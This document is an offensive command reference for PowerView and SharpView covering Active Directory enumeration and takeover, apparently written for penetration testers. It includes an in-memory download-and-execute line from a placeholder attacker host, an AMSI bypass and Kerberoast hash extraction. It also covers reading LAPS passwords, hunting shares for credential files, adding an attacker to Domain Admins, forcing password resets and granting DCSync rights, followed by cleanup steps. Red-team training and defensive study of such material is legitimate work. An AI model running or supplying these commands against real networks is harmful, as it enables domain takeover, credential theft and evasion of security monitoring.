AD Attacks

PowerView / SharpView

PowerView and SharpView complete command reference: domain/user/group/computer/GPO/trust/ACL enumeration, Kerberoast and ASREP targets, delegation discovery, LAPS, share hunting, local admin discovery, and offensive write operations.

PowerView (PowerSploit) is the standard PowerShell AD enumeration library. SharpView is a C# port that works when PowerShell is restricted. Almost every BloodHound attack path needs PowerView to actually execute it.

Load PowerView

# From disk
Import-Module C:\Tools\PowerView.ps1

# From memory (bypass disk-based AV)
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerView.ps1')

# Bypass execution policy
powershell -ep bypass -c "Import-Module .\PowerView.ps1; Get-DomainUser"

# AMSI bypass first (run before importing)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Import-Module .\PowerView.ps1
# SharpView — no PowerShell required
.\SharpView.exe Get-DomainUser -Identity administrator
.\SharpView.exe Find-LocalAdminAccess

Domain / Forest Enumeration

# Current domain info and SID
Get-Domain
Get-DomainSID

# Domain controllers
Get-DomainController
Get-DomainController -Domain child.corp.local

# Forest info and global catalog
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog

# Password policy (lockout threshold, min length)
Get-DomainPolicy
(Get-DomainPolicy).'system access'

# Domain trusts
Get-DomainTrust
Get-DomainTrust -Domain child.corp.local
Get-ForestTrust
Get-DomainTrustMapping    # recursive — maps all trusts

User Enumeration

# All users
Get-DomainUser | select samaccountname

# Specific user — full attributes
Get-DomainUser -Identity jsmith -Properties *

# Kerberoastable (have an SPN). NOTE: -SPN filters only on the presence of an SPN;
# it does not check account state, so disabled accounts appear in this output too.
Get-DomainUser -SPN | select samaccountname, serviceprincipalname

# AS-REP roastable (pre-auth disabled)
Get-DomainUser -KerberosPreauthNotRequired | select samaccountname

# Users with passwords in description / info (legacy misconfig)
Get-DomainUser | Where { $_.description -ne $null } | select samaccountname, description
Get-DomainUser | Where { $_.info -ne $null } | select samaccountname, info

# Privileged accounts (AdminCount=1)
Get-DomainUser -AdminCount | select samaccountname

# Disabled accounts
Get-DomainUser -UACFilter ACCOUNTDISABLE | select samaccountname

# Accounts with no password required
Get-DomainUser -UACFilter PASSWD_NOTREQD | select samaccountname

# Accounts never requiring password expiry
Get-DomainUser -UACFilter DONT_EXPIRE_PASSWORD | select samaccountname

Group Enumeration

# All groups
Get-DomainGroup | select name

# Members of a group (recursive)
Get-DomainGroupMember -Identity 'Domain Admins' -Recurse
Get-DomainGroupMember -Identity 'Enterprise Admins' -Recurse

# All groups a user is member of
Get-DomainGroup -UserName jsmith | select name

# Privileged groups (AdminCount=1)
Get-DomainGroup -AdminCount | select name

# Local groups on a remote machine
Get-NetLocalGroup -ComputerName TARGET
Get-NetLocalGroupMember -ComputerName TARGET -GroupName Administrators

Computer Enumeration

# All computers
Get-DomainComputer | select dnshostname, operatingsystem

# Windows Servers only
Get-DomainComputer -OperatingSystem '*Server*' | select dnshostname, operatingsystem

# Unconstrained delegation computers (escalation targets)
Get-DomainComputer -Unconstrained | select dnshostname

# Constrained delegation computers
Get-DomainComputer -TrustedToAuth | select dnshostname, 'msds-allowedtodelegateto'

# Computers in a specific OU
Get-DomainComputer -SearchBase "OU=Servers,DC=corp,DC=local"

# Ping alive hosts
Get-DomainComputer -Ping | select dnshostname

GPO Enumeration

# All GPOs
Get-DomainGPO | select displayname, gpcfilesyspath

# GPOs applied to a specific computer
Get-DomainGPO -ComputerIdentity WKSTN01 | select displayname

# GPOs that add users as local admin
Get-DomainGPOLocalGroup | select GPODisplayName, GroupMember
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity WKSTN01

# OUs and linked GPOs
Get-DomainOU | select name, gplink

ACL / DACL Enumeration

# ACEs on a specific object
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs

# Find all objects where attacker has interesting rights
# NOTE: only ACEs granted directly to this SID are matched; rights inherited via
# group membership are not reflected here.
$sid = (Get-DomainUser -Identity attacker).objectsid
Get-DomainObjectAcl -ResolveGUIDs |
  Where { $_.SecurityIdentifier -eq $sid } |
  Select ObjectDN, ActiveDirectoryRights

# Find all GenericAll across domain
Get-DomainObjectAcl -ResolveGUIDs |
  Where { $_.ActiveDirectoryRights -match "GenericAll" } |
  Select ObjectDN, IdentityReference

# Find WriteDACL rights
Get-DomainObjectAcl -ResolveGUIDs |
  Where { $_.ActiveDirectoryRights -match "WriteDacl" } |
  Select ObjectDN, IdentityReference

# Check domain object for DCSync rights. Replication requires BOTH extended rights
# (DS-Replication-Get-Changes AND DS-Replication-Get-Changes-All), so a single
# "Replicating" match is not by itself sufficient; GenericAll / WriteDacl on the
# domain object are matched as well because they imply control over its DACL.
Get-DomainObjectAcl -Identity 'DC=corp,DC=local' -ResolveGUIDs |
  Where { $_.ActiveDirectoryRights -match "Replicating|GenericAll|WriteDacl" }

Share / File Enumeration

# Shares on a specific host
Get-NetShare -ComputerName TARGET

# Find accessible shares across domain (uses current user creds)
Find-DomainShare -CheckShareAccess

# Hunt for interesting files in readable shares
Find-InterestingDomainShareFile -Include "*.config","*.xml","password*","cred*","*.kdbx","*.pfx"

# Files accessed recently (-LastAccessTime filters on the last-access timestamp,
# not on modification time — the two can differ considerably)
Find-InterestingDomainShareFile -LastAccessTime (Get-Date).AddDays(-14)

Session / Logged-On User Discovery

# Who is logged onto a host right now
Get-NetLoggedon -ComputerName TARGET
Get-NetSession -ComputerName TARGET

# Find which hosts a user is logged into across the domain
Find-DomainUserLocation -UserIdentity administrator -Verbose

# Find hosts with domain admins logged in
Find-DomainUserLocation -GroupIdentity 'Domain Admins' -Verbose

Local Admin Discovery

# Find hosts where current credential has local admin (noisy)
Find-LocalAdminAccess -Verbose

# Test admin to a specific host
Test-AdminAccess -ComputerName TARGET

# Enumerate members of a local group on every domain computer. This queries each
# host directly over the network rather than reading GPO, so it is noisy as well.
Find-DomainLocalGroupMember -GroupName Administrators

Delegation Discovery

# Unconstrained delegation (users and computers)
Get-DomainUser -Unconstrained | select samaccountname
Get-DomainComputer -Unconstrained | select dnshostname

# Constrained delegation — check allowed services
Get-DomainUser -TrustedToAuth | select samaccountname, 'msds-allowedtodelegateto'
Get-DomainComputer -TrustedToAuth | select dnshostname, 'msds-allowedtodelegateto'

# RBCD — msDS-AllowedToActOnBehalfOfOtherIdentity set on computers
Get-DomainComputer | Where { $_.'msds-allowedtoactonbehalfofotheridentity' -ne $null } |
  select dnshostname, 'msds-allowedtoactonbehalfofotheridentity'

SPN / Kerberoast

# Enumerate all SPNs
Get-DomainUser -SPN | select samaccountname, serviceprincipalname

# Request and output TGS hashes (hashcat format)
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File tgs.txt -Encoding ASCII

# Set SPN on account you control with GenericWrite
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/host.corp.local'}
Invoke-Kerberoast -Identity victim -OutputFormat Hashcat

# Clear SPN after cracking
Set-DomainObject -Identity victim -Clear serviceprincipalname

LAPS

# Check if legacy LAPS is deployed (ms-Mcs-* schema). NOTE: Windows LAPS uses a
# different attribute set (msLAPS-*), so this check does not detect those deployments.
Get-DomainComputer | Where { $_.'ms-Mcs-AdmPwdExpirationTime' -ne $null } | select dnshostname

# Read LAPS passwords (requires AllExtendedRights or explicit read on ms-Mcs-AdmPwd)
Get-DomainComputer | select dnshostname, 'ms-mcs-admpwd', 'ms-mcs-admpwdexpirationtime'
Get-AdmPwdPassword -ComputerName TARGET    # LAPS PowerShell module

Offensive Write Operations

# Add user to group (AddMember or GenericAll on group)
Add-DomainGroupMember -Identity 'Domain Admins' -Members attacker

# Change user's password (ForceChangePassword / GenericAll on user)
Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

# Modify object attribute (GenericWrite)
Set-DomainObject -Identity victim -Set @{description='pwned'}

# Take ownership of an object (WriteOwner)
Set-DomainObjectOwner -Identity victim -OwnerIdentity attacker

# Grant yourself DCSync rights (WriteDACL on domain object)
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' -PrincipalIdentity attacker -Rights DCSync

# Grant full control over an object (WriteDACL)
Add-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All

# Clean up — remove the ACE after use
Remove-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All